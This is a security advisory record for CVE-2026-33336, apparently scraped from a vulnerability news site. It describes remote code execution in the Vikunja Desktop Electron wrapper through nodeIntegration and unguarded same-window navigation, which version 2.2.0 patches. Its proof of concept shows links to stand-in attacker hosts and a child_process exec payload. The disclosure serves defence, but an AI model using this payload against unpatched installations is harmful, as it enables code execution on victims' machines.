{“lastseen”:””,”description”:”Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim’s machine. Version 2.2.0 patches the issue.\\n\\n## Root cause\\n\\nTwo misconfigurations combine to create this vulnerability:\\n\\n1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop\/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).\\n\\n2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop\/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:\\n – `\\u003ca href=\\”https:\/\/…\\”\\u003e` links (without `target=\\”_blank\\”`)\\n – `window.location` assignments\\n – HTTP redirects\\n – `\\u003cmeta http-equiv=\\”refresh\\”\\u003e` tags\\n\\n## Attack scenario\\n\\n1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).\\n2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `\\u003ca href=\\”https:\/\/evil.example\/exploit\\”\\u003eClick here for the updated design spec\\u003c\/a\\u003e`\\n3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it — it is a legitimate anchor tag, not a script injection. Render path example: `frontend\/src\/views\/project\/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.\\n4. The victim uses Vikunja Desktop and clicks the link.\\n5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https:\/\/evil.example\/exploit` in the same renderer process.\\n6. The attacker’s page now executes in a context with `nodeIntegration: true` and runs: `require(‘child_process’).exec(‘id \\u003e \/tmp\/pwned’);`\\n7. Arbitrary commands execute as the victim’s OS user.\\n\\n## Impact\\n\\nFull remote code execution on the victim’s desktop. The attacker can read\/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required — a normal, sanitizer-approved hyperlink is sufficient.\\n\\n## Proof of concept\\n\\n1. Set up a Vikunja instance with two users sharing a project.\\n2. As the attacker user, edit a project description to include: `\\u003ca href=\\”https:\/\/attacker.example\/poc.html\\”\\u003eMeeting notes\\u003c\/a\\u003e`\\n3. Host poc.html with: `\\u003cscript\\u003erequire(‘child_process’).exec(‘calc.exe’)\\u003c\/script\\u003e`\\n4. As the victim, open the project in Vikunja Desktop and click the link.\\n5. calc.exe (or any other command) executes on the victim’s machine.\\n\\n## Credits\\n\\nThis vulnerability was found using [GitHub Security Lab Taskflows](https:\/\/github.com\/GitHubSecurityLab\/seclab-taskflows).”,”published”:”2026-03-24T15:16:14.681Z”,”modified”:”2026-03-24T17:44:50.761Z”,”type”:”cve”,”title”:”Vikunja Desktop vulnerable to Remote Code Execution via same-window navigation”,”source”:”GitHub_M”,”references”:”https:\/\/github.com\/go-vikunja\/vikunja\/security\/advisories\/GHSA-83w9-9jf6-88vf\\nhttps:\/\/vikunja.io\/changelog\/vikunja-v2.2.0-was-released”,”id”:”CVE-2026-33336″,”bulletinFamily”:””,”cwe”:[“CWE-94″],”cvelist”:null,”sourceData”:”go-vikunja vikunja \\u003e= 0.21.0, \\u003c 2.2.0″,”sourceHref”:””,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:P\/VC:N\/VI:N\/VA:N\/SC:H\/SI:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:””,”category_name”:”CVE”,”post_link”:””,”product”:”vikunja”,”version”:”\\u003e= 0.21.0, \\u003c 2.2.0″,”vendor”:”go-vikunja”,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:””,”description”:”Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[6,8,26,12,21,13,7,11,5],"class_list":["post-45967","post","type-post","status-publish","format-standard","hentry","category-category_cve","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n